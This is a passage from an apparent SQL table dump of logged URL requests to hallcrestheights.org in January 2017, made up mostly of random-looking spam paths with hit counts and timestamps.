00:00:00'),(5603,'http://www.hallcrestheights.org/soegszxy-ifet-vtndyuu-hvfcyzls/xxqroxae-hksk-xyxe-i20162633-k19191-mbuqu-dtwq-ceyvuci-wqwsgf/',NULL,'','',1,0,'2017-01-17 07:06:48','0000-00-00 00:00:00'),(5604,'http://www.hallcrestheights.org/yembjvht-qqdc-kzfltzt-erqbwnsw/i20162630-nsnjplpf-trrj-k38451-ncyp-joqwg-zjev-ihsdpac-aylhya/',NULL,'','',1,0,'2017-01-17 07:08:56','0000-00-00 00:00:00'),(5605,'http://www.hallcrestheights.org/tkuykfjd-njjb-ucyupaj-aylrlwfv/dyruqpkl-sdef-hxdf-i20162633-k38991-pdfuf-pfaj-npvzatt-uxdwvp/',NULL,'','',1,0,'2017-01-17 07:11:06','0000-00-00 00:00:00'),(5606,'http://www.hallcrestheights.org/qlbowcig-gece-ayafxrg-lnikghhm/i20162630-k59151-bbxpgesm-rcai-ztbi-auwdt-vixp-mtzhzzw-zrqrdc/',NULL,'','',1,0,'2017-01-17 07:13:15','0000-00-00 00:00:00'),(5607,'http://www.hallcrestheights.org/oiyizgol-rcmw-fbsnopd-gfnhskrl/jrgfctfz-k59691-fiwx-i20162632-wmak-oayos-mpql-gvegdfv-gcrcbz/',NULL,'','',1,0,'2017-01-17 07:15:23','0000-00-00 00:00:00'),(5608,'http://www.hallcrestheights.org/ajqxx-k507-ucuzao-fifep-hiij/imjnjbo-gtsakbcc-gyfmdvju-xzlekts-lshxosqq-i20162635-jvfyo-ihtt/',NULL,'','',1,0,'2017-01-17 07:17:32','0000-00-00 00:00:00'),(5609,'http://www.hallcrestheights.org/cwhriwgp-ekzq-dwkvumz-bsaiimjz/i20162630-fozgdvdd-qjvd-obkn-lykco-k37551-nedw-jmaxevo-rtbzqs/',NULL,'','',1,0,'2017-01-17 07:19:41','0000-00-00 00:00:00'),(5610,'http://www.hallcrestheights.org/soeg-i20162629-szxyife-tvtndyu-uhvfc/yzlsx-xqroxae-hksk-xyxembuq-udtwq-ceyvuc-iwqws-k9155-gfrvrjo/',NULL,'','',1,0,'2017-01-17 07:23:59','0000-00-00 00:00:00'),(5611,'http://www.hallcrestheights.org/ajqx-i20162629-xucuzao-fifephi-ijimj/njbog-tsakbcc-gyfm-dvjuxzle-ktsls-hxosqq-jvfyo-k8255-ihttjpu/',NULL,'','',1,0,'2017-01-17 07:26:08','0000-00-00 00:00:00'),(5612,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb-i20162631-qxdosf/ietyu-aixn-rbdggs-aarhef-skjydmr-ujwim-jqiaa-k8903-urihcywn/',NULL,'','',1,0,'2017-01-17 07:28:18','0000-00-00 00:00:00'),(5613,'http://www.hallcrestheights.org/tkuy-i20162629-kfjdnjj-bucyupa-jaylr/lwfvd-yruqpkl-sdef-hxdfpdfu-fpfaj-npvzat-tuxdw-k5555-vpeekly/',NULL,'','',1,0,'2017-01-17 07:30:27','0000-00-00 00:00:00'),(5614,'http://www.hallcrestheights.org/cwhriwgp-ekzq-dwkvumz-bsaiimjz/fozgdvdd-i20162633-qjvd-obkn-lykco-nedw-jmaxevo-rtbzqs-k19091-axidi/',NULL,'','',1,0,'2017-01-17 07:32:35','0000-00-00 00:00:00'),(5615,'http://www.hallcrestheights.org/xhaj-i20162629-vqlwczb-iqsosqx-oqkgq/aqydc-ptznzvt-jqoe-vpcaqwja-luwty-bckbsx-bnbgn-k47855-ndorcaj/',NULL,'','',1,0,'2017-01-17 07:34:44','0000-00-00 00:00:00'),(5616,'http://www.hallcrestheights.org/oiyizgol-rcmw-fbsnopd-gfnhskrl/jrgfctfz-i20162633-fiwx-wmak-oayos-mpql-gvegdfv-gcrcbz-k38891-mqnod/',NULL,'','',1,0,'2017-01-17 07:41:12','0000-00-00 00:00:00'),(5617,'http://www.hallcrestheights.org/htxw-i20162629-hykrsvs-vhudykb-qxdos/fiety-uaixnrb-dggs-aarhefsk-jydmr-ujwimj-qiaau-k50555-rihcywn/',NULL,'','',1,0,'2017-01-17 07:45:29','0000-00-00 00:00:00'),(5618,'http://www.hallcrestheights.org/tkuykfj-dnjjb-i20162630-ucyupa-jaylrl/wfvdy-ruqp-klsdef-hxdfpd-fufpfaj-npvza-ttuxd-k57503-wvpeekly/',NULL,'','',1,0,'2017-01-17 07:47:38','0000-00-00 00:00:00'),(5619,'http://www.hallcrestheights.org/qlbowcig-gece-ayafxrg-lnikghhm/bbxpgesm-i20162633-rcai-ztbi-auwdt-vixp-mtzhzzw-zrqrdc-k17291-fpsmf/',NULL,'','',1,0,'2017-01-17 07:49:48','0000-00-00 00:00:00'),(5620,'http://www.hallcrestheights.org/htxwhykr-svsv-hudykbq-xdosfiet/yuaixnrb-i20162633-dggs-aarh-efskj-ydmr-ujwimjq-iaauri-k39791-hcywn/',NULL,'','',1,0,'2017-01-17 07:51:56','0000-00-00 00:00:00'),(5621,'http://www.hallcrestheights.org/kzpf-i20162629-fmsxklr-dedhwge-fvbbg/zagpe-ciyyuwu-vfzt-jigjinam-zbcng-tfmlyr-ghdfi-k49295-pwgdqrk/',NULL,'','',1,0,'2017-01-17 07:54:05','0000-00-00 00:00:00'),(5622,'http://www.hallcrestheights.org/bsoapaza-psta-i20162630-sgmhcqc-mckfrdtf/kgpvbchs-iwho-rklv-zrtjr-syoa-ayfwgdx-skmyuk-k59051-cmbqr/',NULL,'','',1,0,'2017-01-17 07:58:23','0000-00-00 00:00:00'),(5623,'http://www.hallcrestheights.org/cwhriwg-pekzq-i20162630-dwkvum-zbsaii/mjzfo-zgdv-ddqjvd-obknly-kconedw-jmaxe-vortb-k58403-zqsaxidi/',NULL,'','',1,0,'2017-01-17 08:00:32','0000-00-00 00:00:00'),(5624,'http://www.hallcrestheights.org/bsoa-pazapst-i20162630-asgmhcq-cmckf/rdtfk-gpvbchs-iwho-rklvzrtj-rsyoa-ayfwgd-xskmy-k27695-ukcmbqr/',NULL,'','',1,0,'2017-01-17 08:02:41','0000-00-00 00:00:00'),(5625,'http://www.hallcrestheights.org/qlbowcig-gece-i20162630-ayafxrg-lnikghhm/bbxpgesm-rcai-ztbi-auwdt-vixp-mtzhzzw-zrqrdc-k38351-fpsmf/',NULL,'','',1,0,'2017-01-17 08:04:51','0000-00-00 00:00:00'),(5626,'http://www.hallcrestheights.org/yembjvh-tqqdc-i20162630-kzfltz-terqbw/nswns-njpl-pftrrj-ncypjo-qwgzjev-ihsdp-acayl-k35903-hyayzeue/',NULL,'','',1,0,'2017-01-17 08:06:59','0000-00-00 00:00:00'),(5627,'http://www.hallcrestheights.org/oiyi-i20162629-zgolrcm-wfbsnop-dgfnh/skrlj-rgfctfz-fiwx-wmakoayo-smpql-gvegdf-vgcrc-k26255-bzmqnod/',NULL,'','',1,0,'2017-01-17 08:09:08','0000-00-00 00:00:00'),(5628,'http://www.hallcrestheights.org/kzpffmsx-klrd-edhwgef-vbbgzagp/i20162632-eciyyuwu-vfzt-jigj-inamz-bcng-tfmlyrg-hdfipw-k59591-gdqrk/',NULL,'','',1,0,'2017-01-17 08:11:17','0000-00-00 00:00:00'),(5629,'http://www.hallcrestheights.org/ajqxxuc-uzaof-i20162630-ifephi-ijimjn/jbogt-sakb-ccgyfm-dvjuxz-lektsls-hxosq-qjvfy-k36803-oihttjpu/',NULL,'','',1,0,'2017-01-17 08:13:26','0000-00-00 00:00:00'),(5630,'http://www.hallcrestheights.org/kzpffms-xklrd-i20162630-edhwge-fvbbgz/agpec-iyyu-wuvfzt-jigjin-amzbcng-tfmly-rghdf-k24023-ipwgdqrk/',NULL,'','',1,0,'2017-01-17 08:15:35','0000-00-00 00:00:00'),(5631,'http://www.hallcrestheights.org/xhajvql-wczbi-i20162630-qsosqx-oqkgqa/qydcp-tznz-vtjqoe-vpcaqw-jaluwty-bckbs-xbnbg-k24923-nndorcaj/',NULL,'','',1,0,'2017-01-17 08:17:45','0000-00-00 00:00:00'),(5632,'http://www.hallcrestheights.org/oiyi-i20162629-zgolrcm-wfbsnop-dgfnh/skrlj-rgfctfz-fiwx-wmakoayo-smpql-gvegdf-vgcrc-k49655-bzmqnod/',NULL,'','',1,0,'2017-01-17 08:19:53','0000-00-00 00:00:00'),(5633,'http://www.hallcrestheights.org/wbwp-i20162629-bonkydh-xjjikvf-vtzpx/bxkcw-jybtylw-osdu-ieqgwsog-xhgpi-sdhtni-rmjhv-k48395-zyxodbx/',NULL,'','',1,0,'2017-01-17 08:22:03','0000-00-00 00:00:00'),(5634,'http://www.hallcrestheights.org/joifa/formmail/book_award05.html',NULL,'','',3,0,'2017-01-17 08:38:38','0000-00-00 00:00:00'),(5635,'http://www.hallcrestheights.org/qlbowci-ggece-i20162630-ayafxr-glnikg/hhmbb-xpge-smrcai-ztbiau-wdtvixp-mtzhz-zwzrq-k56603-rdcfpsmf/',NULL,'','',1,0,'2017-01-17 08:41:22','0000-00-00 00:00:00'),(5636,'http://www.hallcrestheights.org/htxwhykr-svsv-i20162630-hudykbq-xdosfiet/yuaixnrb-dggs-aarh-efskj-ydmr-ujwimjq-iaauri-k37451-hcywn/',NULL,'','',1,0,'2017-01-17 08:46:58','0000-00-00 00:00:00'),(5637,'http://www.hallcrestheights.org/soegszx-yifet-i20162630-vtndyu-uhvfcy/zlsxx-qrox-aehksk-xyxemb-uqudtwq-ceyvu-ciwqw-k44723-sgfrvrjo/',NULL,'','',1,0,'2017-01-17 08:49:46','0000-00-00 00:00:00'),(5638,'http://www.hallcrestheights.org/tkuykfjd-njjb-ucyupaj-aylrlwfv/dyruqpkl-i20162633-sdef-hxdf-pdfuf-pfaj-npvzatt-uxdwvp-k18191-eekly/',NULL,'','',1,0,'2017-01-17 08:52:34','0000-00-00 00:00:00'),(5639,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-paja/ylrlwfv-dyruqpkl-sdefhxdf-i20162635-pdfufpf-ajnpvzat-tuxdw-vpee-k407-klyzxq/',NULL,'','',1,0,'2017-01-17 08:55:22','0000-00-00 00:00:00'),(5640,'http://www.hallcrestheights.org/wbwpbo-i20162629-nkydhxjj-ikvf-vtzpx/bxkc-wjybtyl-wosduie-qgwso-gxhgpi-sdht-nirmjhvz-k14699-yxodbxan/',NULL,'','',1,0,'2017-01-17 08:58:10','0000-00-00 00:00:00'),(5641,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg/i20162632-zagp-eciyyuw-uvfztji-gjina-mzbcng-tfml-yrghdfip-k29639-wgdqrkbh/',NULL,'','',1,0,'2017-01-17 09:00:58','0000-00-00 00:00:00'),(5642,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx/dosfiet-yuaixnrb-dggsaarh-i20162635-efskjyd-mrujwimj-qiaau-rihc-k22007-ywncqs/',NULL,'','',1,0,'2017-01-17 09:03:46','0000-00-00 00:00:00'),(5643,'http://www.hallcrestheights.org/fadla-i20162633-jfnl/k7514-gfpc-vwgmyhde.htm',NULL,'','',1,0,'2017-01-17 09:06:34','0000-00-00 00:00:00'),(5644,'http://www.hallcrestheights.org/upttm-i20162633-nbea/k28214-tgrb-nqcdcncx.htm',NULL,'','',1,0,'2017-01-17 09:12:10','0000-00-00 00:00:00'),(5645,'http://www.hallcrestheights.org/i20162636-zmkuedtz-jivyo/k35630-qxifgxuh-xptvuhm.htm',NULL,'','',1,0,'2017-01-17 09:14:58','0000-00-00 00:00:00'),(5646,'http://www.hallcrestheights.org/dvisciwb-vwkux/i20162634-k57950-krbzomsm-vuclzup.htm',NULL,'','',1,0,'2017-01-17 09:17:47','0000-00-00 00:00:00'),(5647,'http://www.hallcrestheights.org/i20162636-vqjnyspv-holjp/k56330-eurrtpil-uourxiv.htm',NULL,'','',1,0,'2017-01-17 09:20:34','0000-00-00 00:00:00'),(5648,'http://www.hallcrestheights.org/gnfznxvj-xpalt/i20162634-k37250-itjshkyj-yldpija.htm',NULL,'','',1,0,'2017-01-17 09:23:22','0000-00-00 00:00:00'),(5649,'http://www.hallcrestheights.org/upttm-nbea/tgrb-i20162633-nqcdcncx-k7414-rdhcpgzz.htm',NULL,'','',1,0,'2017-01-17 09:26:10','0000-00-00 00:00:00'),(5650,'http://www.hallcrestheights.org/pcscq-rufu/npkw-i20162633-xpoideot-k28114-wtvsoarm.htm',NULL,'','',1,0,'2017-01-17 09:28:58','0000-00-00 00:00:00'),(5651,'http://www.hallcrestheights.org/k37150-dvisciwb-vwkux/krbzomsm-vuclzup-i20162634-hvqa.htm',NULL,'','',1,0,'2017-01-17 09:31:46','0000-00-00 00:00:00'),(5652,'http://www.hallcrestheights.org/k56230-gnfznxvj-i20162636-xpalt/itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-17 09:34:34','0000-00-00 00:00:00'),(5653,'http://www.hallcrestheights.org/k35530-vqjnyspv-i20162636-holjp/eurrtpil-uourxiv-lbtr.htm',NULL,'','',1,0,'2017-01-17 09:37:22','0000-00-00 00:00:00'),(5654,'http://www.hallcrestheights.org/ryvhr-hmqt/k27914-yysl-lgeajanp-dmefnxhq-i20162633-fhjdyh.htm',NULL,'','',1,0,'2017-01-17 09:40:11','0000-00-00 00:00:00'),(5655,'http://www.hallcrestheights.org/mrcqg-beif/k28814-uwgr-abtnwyrq-semgwkow-i20162633-hmemxg.htm',NULL,'','',1,0,'2017-01-17 09:42:58','0000-00-00 00:00:00'),(5656,'http://www.hallcrestheights.org/ryvhrhmq-tyysl/i20162636-k56930-lgeajanp-dmefnxh-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-17 09:45:46','0000-00-00 00:00:00'),(5657,'http://www.hallcrestheights.org/dvisciwb-vwkux/i20162636-k35330-krbzomsm-vuclzup-hvqa-wuoxz.htm',NULL,'','',1,0,'2017-01-17 09:48:34','0000-00-00 00:00:00'),(5658,'http://www.hallcrestheights.org/fadlajfn-lgfpc/i20162636-k56030-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-17 09:51:22','0000-00-00 00:00:00'),(5659,'http://www.hallcrestheights.org/i20162634-upttmnbe-atgrb/k36950-nqcdcncx-rdhcpgz-zdll-imvyx.htm',NULL,'','',1,0,'2017-01-17 09:59:47','0000-00-00 00:00:00'),(5660,'http://www.hallcrestheights.org/k28714-zmkue-i20162633-dtzj-ivyo/qxifgxuh-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-17 10:02:34','0000-00-00 00:00:00'),(5661,'http://www.hallcrestheights.org/lugdl-i20162633-trsm-xxhy/k27814-pzqjllzo-hnjumnte-cwfogy-wbiwy.htm',NULL,'','',1,0,'2017-01-17 10:05:22','0000-00-00 00:00:00'),(5662,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo/hnjumnt-i20162636-k56830-ecwf-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-17 10:08:10','0000-00-00 00:00:00'),(5663,'http://www.hallcrestheights.org/k58450-edzvdlqc-omnnm-i20162634-mcawvbfu/japyvrl-flxh-qjkuh-kcmumb.htm',NULL,'','',1,0,'2017-01-17 10:13:46','0000-00-00 00:00:00'),(5664,'http://www.hallcrestheights.org/pcscqruf-unpkw-i20162634-k36850-xpoideot/wtvsoar-mosm-gepla-lheliy.htm',NULL,'','',1,0,'2017-01-17 10:16:34','0000-00-00 00:00:00'),(5665,'http://www.hallcrestheights.org/k55930-upttmnbe-atgrb-nqcdcncx/rdhcpgz-i20162636-zdll-imvyx-jltfeo.htm',NULL,'','',1,0,'2017-01-17 10:19:22','0000-00-00 00:00:00'),(5666,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde/cwxbdeu-i20162636-dkov-fiibp-k35230-tquhzx.htm',NULL,'','',1,0,'2017-01-17 10:22:10','0000-00-00 00:00:00'),(5667,'http://www.hallcrestheights.org/dvisc-i20162633-iwbv-wkux/krbzomsm-vuclzuph-vqawuo-k7614-xzmnp-zvsgcr.htm',NULL,'','',1,0,'2017-01-17 10:24:58','0000-00-00 00:00:00'),(5668,'http://www.hallcrestheights.org/fadla-i20162633-jfnl-k28314-gfpc/vwgmyhde-cwxbdeud-kovfii-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-17 10:30:34','0000-00-00 00:00:00'),(5669,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh/xptvuhm-i20162636-iwnz-korpv-k56430-ubfgnq-tpmh.htm',NULL,'','',1,0,'2017-01-17 10:33:23','0000-00-00 00:00:00'),(5670,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-k35730-abtnwyrq/semgwko-i20162636-whme-mxgku-cybnpz-kicv.htm',NULL,'','',1,0,'2017-01-17 10:36:10','0000-00-00 00:00:00'),(5671,'http://www.hallcrestheights.org/gnfznxvj-xpalt-i20162634-k58050-itjshkyj/yldpija-amdu-rtaen-pggwtd-vlxt.htm',NULL,'','',1,0,'2017-01-17 10:38:58','0000-00-00 00:00:00'),(5672,'http://www.hallcrestheights.org/vqjnyspv-holjp-i20162634-eurrtpil/uourxiv-lbtr-hnnmt-k37350-qzkowt-sxpp.htm',NULL,'','',1,0,'2017-01-17 10:41:46','0000-00-00 00:00:00'),(5673,'http://www.hallcrestheights.org/gnfzn-k7714-xvjx-palt-itjshkyj/yldpijaa-i20162633-mdurta-enpgg-wtdvlx-tdqku.htm',NULL,'','',1,0,'2017-01-17 10:44:34','0000-00-00 00:00:00'),(5674,'http://www.hallcrestheights.org/dvisc-k28414-iwbv-wkux-krbzomsm/vuclzuph-i20162633-vqawuo-xzmnp-zvsgcr-lycmc.htm',NULL,'','',1,0,'2017-01-17 10:47:22','0000-00-00 00:00:00'),(5675,'http://www.hallcrestheights.org/mrcqgbei-k56530-fuwgr-abtnwyrq-semgwko/whme-mxgku-cybnpz-kicv-i20162636-ejxkulzj.htm',NULL,'','',1,0,'2017-01-17 10:50:10','0000-00-00 00:00:00'),(5676,'http://www.hallcrestheights.org/vqjnyspv-k58150-holjp-eurrtpil-uourxiv/lbtr-hnnmt-i20162634-qzkowt-sxpp-bgrrcdsi.htm',NULL,'','',1,0,'2017-01-17 10:52:58','0000-00-00 00:00:00'),(5677,'http://www.hallcrestheights.org/zmkuedtz-k37450-jivyo-qxifgxuh-xptvuhm/iwnz-korpv-i20162634-ubfgnq-tpmh-prbikzon.htm',NULL,'','',1,0,'2017-01-17 10:55:46','0000-00-00 00:00:00'),(5678,'http://www.hallcrestheights.org/edzvdlqc-k35830-omnnm-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-hmgz-i20162636-nkoheyru.htm',NULL,'','',1,0,'2017-01-17 10:58:34','0000-00-00 00:00:00'),(5679,'http://www.hallcrestheights.org/pcscq-rufu-npkw-i20162633-xpoideot/k7314-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-xvugowo.htm',NULL,'','',1,0,'2017-01-17 11:06:59','0000-00-00 00:00:00'),(5680,'http://www.hallcrestheights.org/jglet-kymd-rqzn-i20162633-rvmlkswa/k28014-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv-oxbdjve.htm',NULL,'','',1,0,'2017-01-17 11:09:46','0000-00-00 00:00:00'),(5681,'http://www.hallcrestheights.org/k37050-fadlajfn-lgfpc-vwgmyhde-cwxbdeu/i20162634-dkov-fiibp-tquhzx-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',1,0,'2017-01-17 11:12:34','0000-00-00 00:00:00'),(5682,'http://www.hallcrestheights.org/k56130-dvisciwb-vwkux-krbzomsm-vuclzup/hvqa-wuoxz-i20162636-mnpzvs-gcrl-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-17 11:15:22','0000-00-00 00:00:00'),(5683,'http://www.hallcrestheights.org/k35430-gnfznxvj-xpalt-itjshkyj-yldpija/amdu-rtaen-i20162636-pggwtd-vlxt-dqkunfgl-qrhzyonx.htm',NULL,'','',1,0,'2017-01-17 11:18:10','0000-00-00 00:00:00'),(5684,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh/xptvuhmi-k7914-wnzkor-pvubf-i20162633-gnqtpm-hprbi-kzonmtl-ajholjr.htm',NULL,'','',1,0,'2017-01-17 11:20:58','0000-00-00 00:00:00'),(5685,'http://www.hallcrestheights.org/vqjny-spvh-oljp-k28614-eurrtpil/uourxivl-btrhnn-mtqzk-i20162633-owtsxp-pbgrr-cdsikib-kxnpfov.htm',NULL,'','',1,0,'2017-01-17 11:23:47','0000-00-00 00:00:00'),(5686,'http://www.hallcrestheights.org/oiyiz-golrcm/i20162634-wfbsn-k52307-opdg/',NULL,'','',1,0,'2017-01-17 11:26:34','0000-00-00 00:00:00'),(5687,'http://www.hallcrestheights.org/ajqxx-ucuzao/fifep-i20162635-k10907-hiij/',NULL,'','',1,0,'2017-01-17 11:29:22','0000-00-00 00:00:00'),(5688,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-i20162634-ilnvoxbd-jveebikp-k36750-tjvlxf.htm',NULL,'','',1,0,'2017-01-17 11:32:10','0000-00-00 00:00:00'),(5689,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-semgwko/whme-mxgku-k58350-cybnpz-kicv-i20162634-ejxkulzj-cjkntsxj-lnuuuv.htm',NULL,'','',1,0,'2017-01-17 11:34:58','0000-00-00 00:00:00'),(5690,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx-rdhcpgz/zdll-imvyx-jltfeo-k35130-bkeb-wivsmqkr-fbmlkmst-i20162636-howgwh.htm',NULL,'','',1,0,'2017-01-17 11:37:46','0000-00-00 00:00:00'),(5691,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-hmgz-i20162634-k37650-nkoheyru-pxpudzik-musshe.htm',NULL,'','',1,0,'2017-01-17 11:40:34','0000-00-00 00:00:00'),(5692,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-k56730-eyooayi/kuks-szqce-baqdom-ytni-holbdent-afymluze-i20162636-xtlfgg.htm',NULL,'','',1,0,'2017-01-17 11:43:22','0000-00-00 00:00:00'),(5693,'http://www.hallcrestheights.org/vqjny-spvh-k7814-oljp-eurrtpil/uourxivl-i20162633-btrhnn-mtqzk-owtsxp-pbgrr-cdsikib-kxnpfov-pyay.htm',NULL,'','',1,0,'2017-01-17 11:46:10','0000-00-00 00:00:00'),(5694,'http://www.hallcrestheights.org/gnfzn-xvjx-k28514-palt-itjshkyj/yldpijaa-i20162633-mdurta-enpgg-wtdvlx-tdqku-nfglqrh-zyonxfe-qnzs.htm',NULL,'','',1,0,'2017-01-17 11:48:58','0000-00-00 00:00:00'),(5695,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-k36650-lgeajanp-dmefnxh/qfhj-dyhao-i20162634-xrcjhw-uvds-vezytwlc-ycwscpua-kqnjtn-plyjup.htm',NULL,'','',1,0,'2017-01-17 11:51:46','0000-00-00 00:00:00'),(5696,'http://www.hallcrestheights.org/pcscqruf-unpkw-k35030-xpoideot-wtvsoar/mosm-gepla-lheliy-rqiy-i20162636-qfufxvug-owopegtq-amzimc-zjvhoh.htm',NULL,'','',1,0,'2017-01-17 11:57:22','0000-00-00 00:00:00'),(5697,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k58250-qxifgxuh-xptvuhm/iwnz-korpv-i20162634-ubfgnq-tpmh-prbikzon-mtlajhol-jrdklt-sqwxxu.htm',NULL,'','',1,0,'2017-01-17 12:00:10','0000-00-00 00:00:00'),(5698,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-k37550-abtnwyrq-semgwko/whme-mxgku-i20162634-cybnpz-kicv-ejxkulzj-cjkntsxj-lnuuuv-tffcgy.htm',NULL,'','',1,0,'2017-01-17 12:02:58','0000-00-00 00:00:00'),(5699,'http://www.hallcrestheights.org/edzvdlqc-omnnm-k56630-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-hmgz-i20162636-nkoheyru-pxpudzik-musshe-qnrfwn.htm',NULL,'','',1,0,'2017-01-17 12:05:46','0000-00-00 00:00:00'),(5700,'http://www.hallcrestheights.org/kzpff-msxklr/k52207-dedhw-gefv-i20162634-bbgzagp/',NULL,'','',1,0,'2017-01-17 12:08:34','0000-00-00 00:00:00'),(5701,'http://www.hallcrestheights.org/i20162635-tkuyk-fjdnjj/k10807-bucyu-paja-ylrlwfv/',NULL,'','',1,0,'2017-01-17 12:11:22','0000-00-00 00:00:00'),(5702,'http://www.hallcrestheights.org/kzpff-i20162635-msxklr/dedhw-gefv-bbgzagp-k10607-eciyyuwu/',NULL,'','',1,0,'2017-01-17 12:16:58','0000-00-00 00:00:00'),(5703,'http://www.hallcrestheights.org/i20162634-yembj-vhtqqd/ckzfl-tzte-rqbwnsw-k52907-nsnjplpf/',NULL,'','',1,0,'2017-01-17 12:19:46','0000-00-00 00:00:00'),(5704,'http://www.hallcrestheights.org/k10507-soegs-zxyife-tvtnd/i20162635-yuuh-vfcyzls-xxqroxae-hkskxyxe/',NULL,'','',1,0,'2017-01-17 12:22:34','0000-00-00 00:00:00'),(5705,'http://www.hallcrestheights.org/qlbow-ciggec-i20162634-eayaf/xrgl-nikghhm-bbxpgesm-k52807-rcaiztbi/',NULL,'','',1,0,'2017-01-17 12:25:22','0000-00-00 00:00:00'),(5706,'http://www.hallcrestheights.org/tkuyk-fjdnjj-i20162634-bucyu/paja-ylrlwfv-dyruqpkl-sdefhxdf-k52407-pdfufpf/',NULL,'','',1,0,'2017-01-17 12:28:10','0000-00-00 00:00:00'),(5707,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik/i20162635-vfvt-zpxbxkc-wjybtylw-osduieqg-k11007-wsogxhg/',NULL,'','',1,0,'2017-01-17 12:30:58','0000-00-00 00:00:00'),(5708,'http://www.hallcrestheights.org/ajqxx-k52507-ucuzao-fifep-hiij/imjnjbo-gtsakbcc-i20162634-gyfmdvju-xzlekts-lshxosqq/',NULL,'','',1,0,'2017-01-17 12:36:34','0000-00-00 00:00:00'),(5709,'http://www.hallcrestheights.org/bsoap-k11107-azapst-asgmh-cqcm/ckfrdtf-kgpvbchs-iwhorklv-i20162635-zrtjrsy-oaayfwgd/',NULL,'','',1,0,'2017-01-17 12:39:22','0000-00-00 00:00:00'),(5710,'http://www.hallcrestheights.org/oiyiz-golrcm-wfbsn-opdg/fnhskrl-i20162635-jrgfctfz-fiwxwmak-k10707-oayosmp-qlgvegdf-vgcrc/',NULL,'','',1,0,'2017-01-17 12:44:58','0000-00-00 00:00:00'),(5711,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-yuuh/i20162634-vfcyzls-xxqroxae-hkskxyxe-k52107-mbuqudt-wqceyvuc-iwqws/',NULL,'','',1,0,'2017-01-17 12:50:34','0000-00-00 00:00:00'),(5712,'http://www.hallcrestheights.org/yembj-vhtqqd-ckzfl-tzte/rqbwnsw-nsnjplpf-trrjncyp-joqwgzj-evihsdpa-i20162635-caylh-k11307-yayz/',NULL,'','',1,0,'2017-01-17 12:53:22','0000-00-00 00:00:00'),(5713,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-vfvt/zpxbxkc-wjybtylw-i20162634-osduieqg-wsogxhg-pisdhtni-rmjhv-zyxo-k52607-dbxant/',NULL,'','',1,0,'2017-01-17 12:56:10','0000-00-00 00:00:00'),(5714,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-xrgl/nikghhm-bbxpgesm-rcaiztbi-i20162635-auwdtvi-xpmtzhzz-wzrqr-dcfp-k11207-smfwaz/',NULL,'','',1,0,'2017-01-17 12:58:59','0000-00-00 00:00:00'),(5715,'http://www.hallcrestheights.org/zmkue-i20162633-dtzj/k18314-ivyo-qxifgxuh.htm',NULL,'','',1,0,'2017-01-17 13:01:46','0000-00-00 00:00:00'),(5716,'http://www.hallcrestheights.org/i20162632-pcscq-rufu/k60614-npkw-xpoideot.htm',NULL,'','',1,0,'2017-01-17 13:04:34','0000-00-00 00:00:00'),(5717,'http://www.hallcrestheights.org/i20162636-upttmnbe-atgrb/k45530-nqcdcncx-rdhcpgz.htm',NULL,'','',1,0,'2017-01-17 13:07:22','0000-00-00 00:00:00'),(5718,'http://www.hallcrestheights.org/i20162636-fadlajfn-lgfpc/k24830-vwgmyhde-cwxbdeu.htm',NULL,'','',1,0,'2017-01-17 13:10:10','0000-00-00 00:00:00'),(5719,'http://www.hallcrestheights.org/jglet-kymd/i20162632-rqzn-rvmlkswa-k60514-zvkecqqn.htm',NULL,'','',1,0,'2017-01-17 13:12:58','0000-00-00 00:00:00'),(5720,'http://www.hallcrestheights.org/vqjny-spvh/oljp-i20162633-eurrtpil-k18214-uourxivl.htm',NULL,'','',1,0,'2017-01-17 13:15:46','0000-00-00 00:00:00'),(5721,'http://www.hallcrestheights.org/k24730-upttmnbe-i20162636-atgrb/nqcdcncx-rdhcpgz-zdll.htm',NULL,'','',1,0,'2017-01-17 13:18:34','0000-00-00 00:00:00'),(5722,'http://www.hallcrestheights.org/k45430-pcscqruf-i20162636-unpkw/xpoideot-wtvsoar-mosm.htm',NULL,'','',1,0,'2017-01-17 13:24:10','0000-00-00 00:00:00'),(5723,'http://www.hallcrestheights.org/jglet-kymd/k18914-rqzn-rvmlkswa-zvkecqqn-i20162633-eeiaqj.htm',NULL,'','',1,0,'2017-01-17 13:26:58','0000-00-00 00:00:00'),(5724,'http://www.hallcrestheights.org/lugdl-trsm/k60314-xxhy-pzqjllzo-i20162632-hnjumnte-cwfogy.htm',NULL,'','',1,0,'2017-01-17 13:29:46','0000-00-00 